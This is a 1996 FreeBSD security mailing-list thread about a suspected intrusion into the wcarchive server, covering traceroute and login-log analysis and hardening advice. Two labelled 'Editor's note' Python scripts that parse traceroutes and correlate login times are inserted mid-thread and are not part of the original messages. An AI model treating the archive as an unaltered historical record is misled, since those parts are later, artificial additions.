security of FreeBSD, I also suspect there was no root compromise on
wcarchive. I'm concerned about the possibility of a DNS server
compromise, given the unusual traceroute results of the intruder's IP.

On another pessimistic note, I believe most of the telco switches in
Russia are still crossbars, which could make any attempt to trace the
intruder through the phone system fruitless.
:<

>
> Jordan
>

-jaeger

From owner-freebsd-security Sun Jun 23 19:46:09 1996
Date: Sun, 23 Jun 1996 22:44:46 -0400 (EDT)
From: Brian Tao
Message-Id: <199606240244.WAA10817@zot.io.org>
To: security@FreeBSD.org
Subject: SKIP IP-layer encryption release Beta 2.3 (fwd)
X-Newsgroups: comp.unix.bsd.freebsd.announce
In-Reply-To: <4qiq3a$3t7@bonkers.taronga.com>
Organization: Internex Online Inc., Toronto, Ontario, Canada

------- start of forwarded message -------
From: skrenta@incog.com (Rich Skrenta)
Newsgroups: comp.unix.bsd.freebsd.announce
Subject: SKIP IP-layer encryption release Beta 2.3
Date: 23 Jun 1996 02:00:58 -0500
Organization: Sun Microsystems, Internet Commerce Group
Lines: 67
Approved: peter@taronga.com
Message-ID: <4qiq3a$3t7@bonkers.taronga.com>
NNTP-Posting-Host: localhost.taronga.com

We are pleased to announce the newest release of our domestic source
reference implementation into the public domain.

From this public domain source release, you can build a fully functional
IP-layer encryption and authentication package with full key management.
Both FreeBSD 2.1.0 and SunOS 4.1.3 are supported in this release. DES,
triple-DES and SAFER are supported for encryption and keyed-MD5 is
supported for authentication.

This source produces a package which contains a loadable module which
works with existing TCP/IP stacks. You do not need to replace (or even
recompile) your IP stack to use this package.

SKIP encrypts traffic at the IP packet layer. Applications do not need to
be recompiled or modified to take advantage of encryption.

Source and pre-built binaries (for FreeBSD 2.1.0) may be obtained by US
and Canadian citizens from

    http://skip.incog.com/

This software may be used without restriction, for commercial and/or
non-commercial purposes.

Features of this release
------------------------

o Support for FreeBSD 2.1.0
o SKIP V2 compliant implementation using ESP and AH encapsulation.
o Support for Authentication using keyed-MD5.
o Support for DES, 3DES, and SAFER 128SK for traffic and key encryption.
o Support for nomadic users
o Support for multiple local identities with different sets of parameters.
o Support for multiple CA (Certificate Authority) certificates.
o Transport mode is supported.
o New Certificate Discovery protocol.
o Highly configurable key manager.
o Support for RAW AH and ESP protocols.
o Diffie-Hellman Public Key Agreement based system.
o Support for multiple NSIDs and multiple local certificates.
o GUI tool for user friendly manipulation of access control lists and
  key statistics.
o Command line tools for manipulating access control lists, etc.
o Implementation of the Certificate Discovery protocol fully integrated
  into SKIP.
o Implementation of X.509 public key certificates.
o Implementation of DSA signature algorithm for certificate signatures.
o Implementation for MD2, MD5 and SHA message digest algorithms.
o Implementation of ASN.1 DER encoding/decoding.
o SunScreen(tm) SKIP compatibility mode.
o Implementation of hashed public keys as defined in the SKIP draft.
  Implementation of programs to generate hashed public keys, to convert
  X.509 Certificates to hashed keys and print both X.509 and Hashed
  certificates.
o High performance Big Number library for Diffie-Hellman calculations.
o Implementation is effectively "public domain" and may be used both
  commercially and non-commercially.
o Patent Agreement with Cylink allows royalty-free use of the
  Diffie-Hellman and other Stanford patents with this package for
  commercial and non-commercial use. Read README.PATENT for some
  restrictions.
o Inclusion of prime generation program used to generate the primes in
  SKIP draft.
------- end of forwarded message -------

From owner-freebsd-security Sun Jun 23 20:35:41 1996
Message-Id: <199606240335.XAA28034@ns2.harborcom.net>
From: "Bradley Dunn"
Organization: Harbor Communications
To: jaeger
Date: Sun, 23 Jun 1996 23:30:58 -0500
Subject: Re: I need help on this one - please help me track this guy
Reply-to: dunn@harborcom.net
Cc: hackers@FreeBSD.org, security@FreeBSD.org

The traceroute results do not indicate any DNS tampering. Traceroute
looks up 127.0.0.1 using gethostbyaddr(), which then uses whatever
address-to-name translation system you have running
(eg /etc/hosts, NIS, DNS). I would certainly hope your translation
system reports localhost for 127.0.0.1. :)

It does indicate that there is something over there that reports its
IP address as 127.0.0.1. Perhaps it is some funky terminal server
hardware. Maybe it returns 127.0.0.1 when it knows that it is
responsible for the particular IP being traced, but that IP isn't
currently assigned?

To test this, I tried tracing to some of the other hosts that would
be in this pool. For example, a230.pu.ru, a231.pu.ru, etc... Some
of the other ones returned this as well. So my guess would be it
was a dialup dynamic IP account, and the terminal server sends
the packets to its loopback interface if the IP isn't assigned.

On 23 Jun 96 at 22:39, jaeger wrote:

> Because of the presence of the lastlog records and the generally
> good security of FreeBSD, I also suspect there was no root
> compromise on wcarchive. I'm concerned about the possibility of a
> DNS server compromise, given the unusual traceroute results of the
> intruder's IP.

Bradley Dunn

From owner-freebsd-security Sun Jun 23 20:44:17 1996
From: Michael Smith
Message-Id: <199606240418.NAA19897@genesis.atrad.adelaide.edu.au>
Subject: Re: I need help on this one - please help me track this guy down!
To: jkh@time.cdrom.com (Jordan K. Hubbard)
Date: Mon, 24 Jun 1996 13:48:40 +0930 (CST)
Cc: jaeger@com, hackers@freebsd.org, security@freebsd.org, ache@freebsd.org
In-Reply-To: <8355.835580221@time.cdrom.com> from "Jordan K. Hubbard" at Jun 23, 96 06:37:01 pm

Jordan K. Hubbard stands accused of saying:
>
> > Could this intrusion possibly have been a result of using cleartext
> > remote login sessions?
>
> I don't think so - I have a pretty secure path to wcarchive (the T1 at
> WC goes straight into the same service provider's backbone that
> wcarchive is on). Both David and I are somewhat worried by this
> compromise.

You said you were on the road a little while back; how often do you
change your passwords?

> Jordan

-- 
]] Mike Smith, Software Engineer        msmith@atrad.adelaide.edu.au    [[
]] Genesis Software                     genesis@atrad.adelaide.edu.au   [[
]] High-speed data acquisition and      (GSM mobile) 0411-222-496       [[
]] realtime instrument control          (ph/fax) +61-8-267-3039         [[
]] Collector of old Unix hardware.      "Where are your PEZ?" The Tick  [[

From owner-freebsd-security Sun Jun 23 20:46:59 1996
Message-Id: <199606240335.HAA00490@nagual.ru>
Subject: Re: I need help on this one - please help me track this guy down!
To: jkh@time.cdrom.com (Jordan K. Hubbard)
Date: Mon, 24 Jun 1996 07:35:39 +0400 (MSD)
Cc: hasty@rah.star-gate.com, hackers@FreeBSD.org, security@FreeBSD.org
In-Reply-To: <8378.835580425@time.cdrom.com> from "Jordan K. Hubbard" at "Jun 23, 96 06:40:25 pm"
From: Андрей Чернов (Andrey A. Chernov)

> > Also since "you" were logged in, try to look in the logs for a
> > login session of a foreign host and I would report the incident to the
> > FBI 8)
>
> All we have are the "last" logs, which show:
>
> jkh       ttyp2    a235.pu.ru       Sun Jun 23 16:50 - 17:18  (00:28)
> jkh       ttyp3    a235.pu.ru       Sun Jun 23 15:00 - 15:34  (00:33)
>
> If someone at the russian site could help correlate this time (PST) to
> the local time at wherever a235.ru.pu came in from, we could at least
> narrow down which user(s) it might have been.

This address is a SLIP line somewhere at St Petersburg University.
Local St Petersburg time is equal to Moscow time: GMT+4 now.
You can search/ask the domain owner somewhere at
http://www.ripn.net/nic/NICHomePage.html

-- 
Andrey A. Chernov
http://www.nagual.ru/~ache/

From owner-freebsd-security Sun Jun 23 20:47:25 1996
To: Michael Smith
Cc: hackers@freebsd.org, security@freebsd.org, ache@freebsd.org
Subject: Re: I need help on this one - please help me track this guy down!
In-reply-to: Your message of "Mon, 24 Jun 1996 13:48:40 +0930." <199606240418.NAA19897@genesis.atrad.adelaide.edu.au>
Date: Sun, 23 Jun 1996 20:46:38 -0700
Message-ID: <9123.835587998@time.cdrom.com>
From: "Jordan K. Hubbard"

[jaeger@com removed from cc - he needs to fix his headers :-)]

> Jordan K. Hubbard stands accused of saying:
>
> You said you were on the road a little while back; how often do you change
> your passwords?

Clearly not often enough, I guess. I've changed it everywhere and
installed ssh on wcarchive.

Ah well, I guess we all need one good security scare a year to keep us
aware of the fact that the Internet is all one big bad neighborhood
after dark now... :-)

Jordan

From owner-freebsd-security Sun Jun 23 20:49:07 1996
From: Michael Smith
Message-Id: <199606240423.NAA19939@genesis.atrad.adelaide.edu.au>
Subject: Re: I need help on this one - please help me track this guy down!
To: hasty@rah.star-gate.com (Amancio Hasty)
Date: Mon, 24 Jun 1996 13:53:26 +0930 (CST)
Cc: security@freebsd.org
In-Reply-To: <199606240201.TAA02005@rah.star-gate.com> from "Amancio Hasty" at Jun 23, 96 07:01:17 pm

Amancio Hasty stands accused of saying:
>
> I would report it nevertheless and who knows they may even have
> e-mail... Also, I am a bit concerned that he tried to erase your
> home directory because he/she probably had something in that directory.

It's a bit late for 20-20 hindsight of course, but the first thing I
usually do in that case is a recursive chmod/chown of everything in the
compromised user's home directory. (usually to 'nobody'/666)

> BTW: It could be a woman in that case it may be difficult to get
> her balls 8)

My SO just suggested one of those rotating gadgets that plumbers use for
cleaning drains with. My, but she has a nasty mind.

> Amancio

-- 
]] Mike Smith, Software Engineer        msmith@atrad.adelaide.edu.au    [[
]] Genesis Software                     genesis@atrad.adelaide.edu.au   [[
]] High-speed data acquisition and      (GSM mobile) 0411-222-496       [[
]] realtime instrument control          (ph/fax) +61-8-267-3039         [[
]] Collector of old Unix hardware.      "Where are your PEZ?" The Tick  [[

From owner-freebsd-security Sun Jun 23 20:50:51 1996
Date: Sun, 23 Jun 1996 23:50:09 -0400 (EDT)
From: jaeger
To: Bradley Dunn
Cc: hackers@FreeBSD.org, security@FreeBSD.org
Subject: Re: I need help on this one - please help me track this guy
In-Reply-To: <199606240335.XAA28034@ns2.harborcom.net>

On Sun, 23 Jun 1996, Bradley Dunn wrote:

> The traceroute results do not indicate any DNS tampering. Traceroute
> looks up 127.0.0.1 using gethostbyaddr(), which then uses whatever
> address-to-name translation system you have running
> (eg /etc/hosts, NIS, DNS). I would certainly hope your translation
> system reports localhost for 127.0.0.1. :)

Whoops! I think I should cut back on the caffeine...;>

>
> It does indicate that there is something over there that reports its
> IP address as 127.0.0.1. Perhaps it is some funky terminal server
> hardware. Maybe it returns 127.0.0.1 when it knows that it is
> responsible for the particular IP being traced, but that IP isn't
> currently assigned?
>
> To test this, I tried tracing to some of the other hosts that would
> be in this pool. For example, a230.pu.ru, a231.pu.ru, etc... Some
> of the other ones returned this as well. So my guess would be it
> was a dialup dynamic IP account, and the terminal server sends
> the packets to its loopback interface if the IP isn't assigned.
>

I've never encountered this behavior before. Does anyone know what make
or model of hardware this might be?

> Bradley Dunn
>

-jaeger

From owner-freebsd-security Sun Jun 23 21:12:20 1996
Message-Id:
From: batie@agora.rdrop.com (Alan Batie)
Subject: Re: I need help on this one - please help me track this guy
To: dunn@harborcom.net
Date: Sun, 23 Jun 1996 21:11:59 -0700 (PDT)
Cc: jaeger@com, hackers@FreeBSD.org, security@FreeBSD.org
In-Reply-To: <199606240335.XAA28034@ns2.harborcom.net> from "Bradley Dunn" at Jun 23, 96 11:30:58 pm

> To: jaeger

I can't believe this is valid, so he's probably not going to get a copy
of this...

> It does indicate that there is something over there that reports its
> IP address as 127.0.0.1. Perhaps it is some funky terminal server
> hardware.

11  slip-0.pu.ru (193.124.85.1)  581.747 ms  585.953 ms  509.617 ms
12  nat.pu.ru (193.124.85.134)  579.649 ms  553.069 ms  569.455 ms
13  gw.pu.ru (193.124.85.219)  565.162 ms  566.153 ms  579.921 ms
14  * * *
    (localhost appeared here for Jordan)

If "nat" means what I think it does (Network Address Translation;
recently devised devices to translate IP addresses so private internal
networks can reuse addresses in the public space), it's probably an
artifact of being behind the NAT.

-- 
Alan Batie                 ______      We're Starfleet officers:
batie@agora.rdrop.com      \    /      Weird is part of the job.
+1 503 452-0960             \  /         --Captain Janeway
DE 3C 29 17 C0 49 7A 27      \/    40 A5 3C 37 4A DA 52 B9

It is my policy to avoid purchase of any products from companies which
use unrequested email advertisements or telephone solicitation.
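[Editor's note: the following worked example is added here and is not part of the thread or anyone's posted code. It takes the two traceroutes posted above by Jordan and Alan (transcribed as constructed sample input) and applies the reading Bradley and Alan arrive at: classify each hop as public, RFC 1918 private, loopback or silent, treat the first non-public hop as an artifact of the far end (terminal server, NAT box, unassigned dial-up address) and report the last hop that can actually be attributed to someone, which is who you would contact. The function names, the classification rule and the "nat" hostname hint are mine, not anything the thread defines.]

```python
import ipaddress
import re

# Constructed from the two traceroutes posted in this thread (Jordan's from
# wcarchive, Alan Batie's from agora); hop numbers differ because the traces
# start from different networks.
JORDAN_TRACE = """\
 5  Helsinki2.FI.EU.net (134.222.228.45)  555.687 ms  518.720 ms  507.602 ms
 6  StPetersburg.RU.EU.net (134.222.23.2)  549.172 ms  592.407 ms  630.928 ms
 7  spb-2-gw.spb.su (193.124.83.66)  547.190 ms  573.518 ms  569.656 ms
 8  hqlgu-LE.pu.ru (193.124.255.134)  519.318 ms  657.805 ms  651.496 ms
 9  slip-0.pu.ru (193.124.85.1)  840.489 ms  671.729 ms  650.750 ms
10  nat.pu.ru (193.124.85.134)  638.649 ms  653.720 ms  720.170 ms
11  gw.pu.ru (193.124.85.219)  752.144 ms  645.046 ms  641.413 ms
12  localhost (127.0.0.1)  670.113 ms  702.233 ms  695.733 ms
"""

BATIE_TRACE = """\
11  slip-0.pu.ru (193.124.85.1)  581.747 ms  585.953 ms  509.617 ms
12  nat.pu.ru (193.124.85.134)  579.649 ms  553.069 ms  569.455 ms
13  gw.pu.ru (193.124.85.219)  565.162 ms  566.153 ms  579.921 ms
14  * * *
"""

# "<ttl>  <name> (<dotted quad>) ..." ; the RTT columns are ignored.
HOP_RE = re.compile(r"^\s*(\d+)\s+(\S+)\s+\((\d{1,3}(?:\.\d{1,3}){3})\)")
TIMEOUT_RE = re.compile(r"^\s*(\d+)\s+\*")


def classify_addr(addr):
    """Label the responding address; None means the hop never answered."""
    if addr is None:
        return "no-reply"
    ip = ipaddress.ip_address(addr)
    if ip.is_loopback:      # 127/8: the responder is talking about itself
        return "loopback"
    if ip.is_private:       # RFC 1918 space leaking out from behind a NAT
        return "private"
    return "public"


def parse_hops(text):
    """Parse traceroute output into hop records (silent hops keep addr=None)."""
    hops = []
    for line in text.splitlines():
        m = HOP_RE.match(line)
        if m:
            ttl, name, addr = int(m.group(1)), m.group(2), m.group(3)
        else:
            t = TIMEOUT_RE.match(line)
            if not t:
                continue    # blank or unrecognised line
            ttl, name, addr = int(t.group(1)), None, None
        hops.append({"ttl": ttl, "name": name, "addr": addr,
                     "kind": classify_addr(addr)})
    return hops


def analyse(text):
    """Find the last hop that can be attributed to a real, routable device.

    Everything from the first loopback/private/silent hop onwards is treated
    as an artifact of the far end, not as a host worth contacting.
    """
    hops = parse_hops(text)
    last_attributable = None
    artifact = None
    for hop in hops:
        if hop["kind"] == "public":
            last_attributable = hop
        else:
            artifact = hop
            break
    # Hostname hint only: a first label starting with "nat" (e.g. nat.pu.ru).
    nat_in_path = any(h["name"] and h["name"].lower().split(".")[0].startswith("nat")
                      for h in hops)
    return {"hops": hops, "last_attributable": last_attributable,
            "artifact": artifact, "nat_in_path": nat_in_path}


if __name__ == "__main__":
    for label, trace in (("Jordan", JORDAN_TRACE), ("Batie", BATIE_TRACE)):
        r = analyse(trace)
        la, art = r["last_attributable"], r["artifact"]
        print(f"{label}: contact the admins of {la['name']} ({la['addr']}); "
              f"hop {art['ttl']} is {art['kind']}; NAT in path: {r['nat_in_path']}")
```

Both traces end at gw.pu.ru (193.124.85.219) as the last attributable hop; the 127.0.0.1 answer in Jordan's trace and the silence in Alan's are the same terminal-server/NAT artifact seen from two vantage points, which is why the name-to-address lookup of 127.0.0.1 says nothing about DNS at either end.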
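[Editor's note: a second added example, not from the thread, for the correlation Jordan asks for earlier in the thread: take the two "last" lines he posted (constructed sample input here), check that each session's printed duration agrees with its login/logout times, flag sessions from hosts jkh is not expected to come in from, and restate the times in the far end's clock using Andrey's note that St Petersburg is on Moscow time, GMT+4. It assumes the wcarchive clock was at -0700 as the Date: headers in this thread show, 1996 as the year last(1) omits, and an expected-host list made up for the example.]

```python
import re
from datetime import datetime, timedelta, timezone

# The two lines Jordan posted from wcarchive's "last" output (constructed
# sample: the column spacing is what last(1) prints, the year is not).
LAST_OUTPUT = """\
jkh       ttyp2    a235.pu.ru       Sun Jun 23 16:50 - 17:18  (00:28)
jkh       ttyp3    a235.pu.ru       Sun Jun 23 15:00 - 15:34  (00:33)
"""

YEAR = 1996                                  # last(1) prints no year; assumed
LOCAL_TZ = timezone(timedelta(hours=-7))     # wcarchive: -0700 per Date: headers
REMOTE_TZ = timezone(timedelta(hours=4))     # St Petersburg = Moscow, GMT+4 (Andrey)
# Hosts jkh normally logs in from; an assumption made up for this example.
EXPECTED_HOSTS = {"time.cdrom.com", "localhost"}

# user  tty  host  Dow Mon dd HH:MM - HH:MM  (hh:mm)
LAST_RE = re.compile(
    r"^(\S+)\s+(\S+)\s+(\S+)\s+\w{3}\s+(\w{3})\s+(\d{1,2})\s+"
    r"(\d\d:\d\d)\s+-\s+(\d\d:\d\d)\s+\((\d+):(\d\d)\)"
)


def parse_last(text, year=YEAR, local_tz=LOCAL_TZ):
    """Turn completed sessions from last(1) into timezone-aware records."""
    sessions = []
    for line in text.splitlines():
        m = LAST_RE.match(line)
        if not m:
            continue    # reboots, "still logged in", "gone - no logout"
        user, tty, host, mon, day, t_in, t_out, dh, dm = m.groups()
        start = datetime.strptime(f"{mon} {day} {year} {t_in}", "%b %d %Y %H:%M")
        end = datetime.strptime(f"{mon} {day} {year} {t_out}", "%b %d %Y %H:%M")
        if end < start:                      # logout after local midnight
            end += timedelta(days=1)
        start = start.replace(tzinfo=local_tz)
        end = end.replace(tzinfo=local_tz)
        claimed = timedelta(hours=int(dh), minutes=int(dm))
        # last(1) truncates seconds, so the printed duration may be a minute
        # short of logout-minus-login; anything beyond that means wtmp was
        # edited or the clock jumped during the session.
        duration_ok = abs((end - start) - claimed) <= timedelta(minutes=1)
        sessions.append({"user": user, "tty": tty, "host": host,
                         "start": start, "end": end, "duration_ok": duration_ok})
    return sessions


def fmt(dt, tz):
    return dt.astimezone(tz).strftime("%Y-%m-%d %H:%M %z")


def correlate(text, remote_tz=REMOTE_TZ, expected_hosts=EXPECTED_HOSTS):
    """Flag sessions from unexpected hosts and restate them in the remote
    site's clock, which is what the far-end admins need to search their logs."""
    out = []
    for s in parse_last(text):
        out.append({**s,
                    "suspicious": s["host"] not in expected_hosts,
                    "start_remote": fmt(s["start"], remote_tz),
                    "end_remote": fmt(s["end"], remote_tz)})
    return out


if __name__ == "__main__":
    for s in correlate(LAST_OUTPUT):
        flag = "SUSPECT" if s["suspicious"] else "ok"
        print(f"{flag:7} {s['user']:5} {s['tty']:6} {s['host']:12} "
              f"{s['start_remote']} -> {s['end_remote']} "
              f"duration_ok={s['duration_ok']}")
```

Run as-is it reports both a235.pu.ru sessions as suspect and places them in the early hours of Mon Jun 24 St Petersburg time (03:50 and 02:00 local), which is the window to give the pu.ru admins for their terminal-server logs. The second line is a good reminder of why the tolerance is there: 15:00 to 15:34 is 34 minutes on the face of it, yet last printed (00:33), because it drops seconds.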
From owner-freebsd-security Sun Jun 23 22:38:42 1996
Return-Path: owner-security
Received: (from root@localhost) by freefall.freebsd.org (8.7.5/8.7.3) id WAA25087 for security-outgoing; Sun, 23 Jun 1996 22:38:42 -0700 (PDT)
Received: from bang.rain.com (bang.rain.com [204.119.8.73]) by freefall.freebsd.org (8.7.5/8.7.3) with SMTP id WAA25082; Sun, 23 Jun 1996 22:38:38 -0700 (PDT)
Received: (from john@localhost) by bang.rain.com (8.6.12/8.6.9) id WAA23685; Sun, 23 Jun 1996 22:38:21 -0700
From: John Cavanaugh
Message-Id: <199606240538.WAA23685@bang.rain.com>
Subject: Re: I need help on this one - please help me track this guy down!
To: jkh@time.cdrom.com (Jordan K. Hubbard)
Date: Sun, 23 Jun 1996 22:38:20 -0700 (PDT)
Cc: hasty@rah.star-gate.com, hackers@FreeBSD.org, security@FreeBSD.org, ache@FreeBSD.org
In-Reply-To: <8378.835580425@time.cdrom.com> from "Jordan K. Hubbard" at Jun 23, 96 06:40:25 pm
X-Mailer: ELM [version 2.4 PL24]
Content-Type: text
Sender: owner-security@FreeBSD.org
X-Loop: FreeBSD.org
Precedence: bulk

> > Also since "you" were logged in , try to look in the logs for a
> > a login session of a foreign host and I would report the incident to the
> > FBI 8)
>
> All we have are the "last" logs, which show:
>
> jkh ttyp2 a235.pu.ru Sun Jun 23 16:50 - 17:18 (00:28)
> jkh ttyp3 a235.pu.ru Sun Jun 23 15:00 - 15:34 (00:33)
>
> If someone at the russian site could help correlate this time (PST) to
> the local time at wherever a235.ru.pu came in from, we could at least
> narrow down which user(s) it might have been.
>
> Also, I think that calling the FBI on this one is only likely to get
> me put on infinite hold when they hear that the perpetrator is in
> Russia. :-)

Maybe it's time to call Cliff Stoll.

--
John Cavanaugh
"There can be only one."

From owner-freebsd-security Sun Jun 23 23:25:50 1996
Return-Path: owner-security
Received: (from root@localhost) by freefall.freebsd.org (8.7.5/8.7.3) id XAA27306 for security-outgoing; Sun, 23 Jun 1996 23:25:50 -0700 (PDT)
Received: from gvr.win.tue.nl (root@gvr.win.tue.nl [131.155.210.19]) by freefall.freebsd.org (8.7.5/8.7.3) with SMTP id XAA27291; Sun, 23 Jun 1996 23:25:45 -0700 (PDT)
Received: by gvr.win.tue.nl (8.6.12/1.53) id IAA11793; Mon, 24 Jun 1996 08:25:33 +0200
From: guido@gvr.win.tue.nl (Guido van Rooij)
Message-Id: <199606240625.IAA11793@gvr.win.tue.nl>
Subject: Re: I need help on this one - please help me track this guy down!
To: jkh@time.cdrom.com (Jordan K. Hubbard)
Date: Mon, 24 Jun 1996 08:25:32 +0200 (MET DST)
Cc: hackers@freebsd.org, security@freebsd.org, ache@freebsd.org
In-Reply-To: <7979.835575935@time.cdrom.com> from "Jordan K. Hubbard" at "Jun 23, 96 05:25:35 pm"
X-Mailer: ELM [version 2.4ME+ PL17 (25)]
MIME-Version: 1.0
Content-Type: text/plain; charset=US-ASCII
Content-Transfer-Encoding: 7bit
Sender: owner-security@freebsd.org
X-Loop: FreeBSD.org
Precedence: bulk

> A traceroute from wcarchive doesn't show me much, but if anybody can
> glean some useful information out of it I'd appreciate it.
>
> Thanks!
>
> 5 Helsinki2.FI.EU.net (134.222.228.45) 555.687 ms 518.720 ms 507.602 ms
> 6 StPetersburg.RU.EU.net (134.222.23.2) 549.172 ms 592.407 ms 630.928 ms
> 7 spb-2-gw.spb.su (193.124.83.66) 547.190 ms 573.518 ms 569.656 ms
> 8 hqlgu-LE.pu.ru (193.124.255.134) 519.318 ms 657.805 ms 651.496 ms
> 9 slip-0.pu.ru (193.124.85.1) 840.489 ms 671.729 ms 650.750 ms
> 10 nat.pu.ru (193.124.85.134) 638.649 ms 653.720 ms 720.170 ms
> 11 gw.pu.ru (193.124.85.219) 752.144 ms 645.046 ms 641.413 ms
> 12 localhost (127.0.0.1) 670.113 ms 702.233 ms 695.733 ms
> ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^

Do you have anti-spoof filter rules in your backbone router? If not install them. If so, please add packets coming in from localhost to them.

I don't know why he got in, but you can suspect rlogin plus a localhost entry in hosts.equiv combined with source routed packets. In general it is a bad idea to trust localhost, as this is a relative ip address. Unless of course you either block packets coming from localhost or block source routed packets.
-Guido

From owner-freebsd-security Sun Jun 23 23:29:43 1996
Return-Path: owner-security
Received: (from root@localhost) by freefall.freebsd.org (8.7.5/8.7.3) id XAA27632 for security-outgoing; Sun, 23 Jun 1996 23:29:43 -0700 (PDT)
Received: from time.cdrom.com (time.cdrom.com [204.216.27.226]) by freefall.freebsd.org (8.7.5/8.7.3) with ESMTP id XAA27622; Sun, 23 Jun 1996 23:29:38 -0700 (PDT)
Received: from time.cdrom.com (localhost [127.0.0.1]) by time.cdrom.com (8.7.5/8.6.9) with ESMTP id XAA10328; Sun, 23 Jun 1996 23:29:31 -0700 (PDT)
To: guido@gvr.win.tue.nl (Guido van Rooij)
cc: hackers@freebsd.org, security@freebsd.org, ache@freebsd.org
Subject: Re: I need help on this one - please help me track this guy down!
In-reply-to: Your message of "Mon, 24 Jun 1996 08:25:32 +0200." <199606240625.IAA11793@gvr.win.tue.nl>
Date: Sun, 23 Jun 1996 23:29:30 -0700
Message-ID: <10326.835597770@time.cdrom.com>
From: "Jordan K. Hubbard"
Sender: owner-security@freebsd.org
X-Loop: FreeBSD.org
Precedence: bulk

> Do you have anti-spoof filter rules in your backbone router? If not
> install them. If so, please add packets coming in from localhost

How do you install such things on a cisco 2500? :-) Seriously, if there's a way then I can get someone from cisco to help me out, but I first need to know that it's even a reasonable request.

> to them. I don't know why he got in, but you can suspect rlogin plus
> a localhost entry in hosts.equiv combined with source routed packets.

Hmmm. We have reason to believe that he *didn't* get root (though we're still assuming he did, just to be paranoid) and if the mod times can be trusted, hosts.equiv hasn't been touched in many months (and localhost is commented out).

Jordan

From owner-freebsd-security Sun Jun 23 23:35:04 1996
Return-Path: owner-security
Received: (from root@localhost) by freefall.freebsd.org (8.7.5/8.7.3) id XAA27978 for security-outgoing; Sun, 23 Jun 1996 23:35:04 -0700 (PDT)
Received: from time.cdrom.com (time.cdrom.com [204.216.27.226]) by freefall.freebsd.org (8.7.5/8.7.3) with ESMTP id XAA27973; Sun, 23 Jun 1996 23:35:01 -0700 (PDT)
Received: from time.cdrom.com (localhost [127.0.0.1]) by time.cdrom.com (8.7.5/8.6.9) with ESMTP id XAA10348; Sun, 23 Jun 1996 23:34:53 -0700 (PDT)
To: guido@gvr.win.tue.nl (Guido van Rooij)
cc: hackers@freebsd.org, security@freebsd.org, ache@freebsd.org
Subject: Re: I need help on this one - please help me track this guy down!
In-reply-to: Your message of "Mon, 24 Jun 1996 08:25:32 +0200." <199606240625.IAA11793@gvr.win.tue.nl>
Date: Sun, 23 Jun 1996 23:34:53 -0700
Message-ID: <10346.835598093@time.cdrom.com>
From: "Jordan K. Hubbard"
Sender: owner-security@freebsd.org
X-Loop: FreeBSD.org
Precedence: bulk

> ip address. Unless of course you either block packets coming from localhost
> or block source routed packets.

Oh yeah, also, David says both we and CRL (the ISP) block source routed packets.

Jordan

From owner-freebsd-security Sun Jun 23 23:56:22 1996
Return-Path: owner-security
Received: (from root@localhost) by freefall.freebsd.org (8.7.5/8.7.3) id XAA28785 for security-outgoing; Sun, 23 Jun 1996 23:56:22 -0700 (PDT)
Received: from phaeton.artisoft.com (phaeton.Artisoft.COM [198.17.250.211]) by freefall.freebsd.org (8.7.5/8.7.3) with SMTP id XAA28779; Sun, 23 Jun 1996 23:56:19 -0700 (PDT)
Received: (from terry@localhost) by phaeton.artisoft.com (8.6.11/8.6.9) id XAA27306; Sun, 23 Jun 1996 23:51:37 -0700
From: Terry Lambert
Message-Id: <199606240651.XAA27306@phaeton.artisoft.com>
Subject: Re: I need help on this one - please help me track this guy down!
To: jkh@time.cdrom.com (Jordan K. Hubbard)
Date: Sun, 23 Jun 1996 23:51:37 -0700 (MST)
Cc: guido@gvr.win.tue.nl, hackers@freebsd.org, security@freebsd.org, ache@freebsd.org
In-Reply-To: <10326.835597770@time.cdrom.com> from "Jordan K. Hubbard" at Jun 23, 96 11:29:30 pm
X-Mailer: ELM [version 2.4 PL24]
MIME-Version: 1.0
Content-Type: text/plain; charset=US-ASCII
Content-Transfer-Encoding: 7bit
Sender: owner-security@freebsd.org
X-Loop: FreeBSD.org
Precedence: bulk

> Hmmm. We have reason to believe that he *didn't* get root (though
> we're still assuming he did, just to be paranoid) and if the mod times
> can be trusted, hosts.equiv hasn't been touched in many months (and
> localhost is commented out).

1) Do not believe this. Assume he got root.

2) Assume your password changes are mailed out as cleartext by your passwd program.

3) Assume md5 and checksum have been hacked to lie about themselves and any other files affected.

4) Assume system time stamps were changed.

5) Assume all log files were edited.

6) Best approach: reinstall the system (from distribution, not backup --- no telling how long he was there).

7) Turn off the stupid "password must meet these criteria" on the password change. All it does is reduce the search space a hacker needs to apply.

8) Put spoofing filters on your firewall; basically, look for the response bit.

9) Make sure you aren't running routed -q.

10) Turn off source routing on your gateway, if it's on.

If you need help getting the FBI involved, tell them you had "munitions" on the machine. ;-).

Terry Lambert
terry@lambert.org
---
Any opinions in this posting are my own and not those of my present or previous employers.
From owner-freebsd-security Mon Jun 24 00:36:40 1996
Return-Path: owner-security
Received: (from root@localhost) by freefall.freebsd.org (8.7.5/8.7.3) id AAA01302 for security-outgoing; Mon, 24 Jun 1996 00:36:40 -0700 (PDT)
Received: from einstein.technet.sg (ngps@einstein.technet.sg [192.169.33.50]) by freefall.freebsd.org (8.7.5/8.7.3) with ESMTP id AAA01282; Mon, 24 Jun 1996 00:36:29 -0700 (PDT)
Received: (from ngps@localhost) by einstein.technet.sg (8.7.3/8.6.9) id PAA17929; Mon, 24 Jun 1996 15:35:02 +0800 (SST)
Date: Mon, 24 Jun 1996 15:35:01 +0800 (SST)
From: Ng Pheng Siong
To: Terry Lambert
cc: "Jordan K. Hubbard" , guido@gvr.win.tue.nl, hackers@FreeBSD.ORG, security@FreeBSD.ORG, ache@FreeBSD.ORG
Subject: Re: I need help on this one - please help me track this guy down!
In-Reply-To: <199606240651.XAA27306@phaeton.artisoft.com>
Message-ID:
MIME-Version: 1.0
Content-Type: TEXT/PLAIN; charset=US-ASCII
Sender: owner-security@FreeBSD.ORG
X-Loop: FreeBSD.org
Precedence: bulk

On Sun, 23 Jun 1996, Terry Lambert wrote:
> 1) Do not believe this. Assume he got root.

Fundamental question: how did the intruder get in? Telnet with reusable passwords, or something else?

Note that the intruder is probably reading these lists. ;)

- PS
--
Ng Pheng Siong * Finger for PGP key.
Pacific Internet Pte Ltd * Singapore

Fast, secure, cheap. Pick two.

From owner-freebsd-security Mon Jun 24 01:22:40 1996
Return-Path: owner-security
Received: (from root@localhost) by freefall.freebsd.org (8.7.5/8.7.3) id BAA03701 for security-outgoing; Mon, 24 Jun 1996 01:22:40 -0700 (PDT)
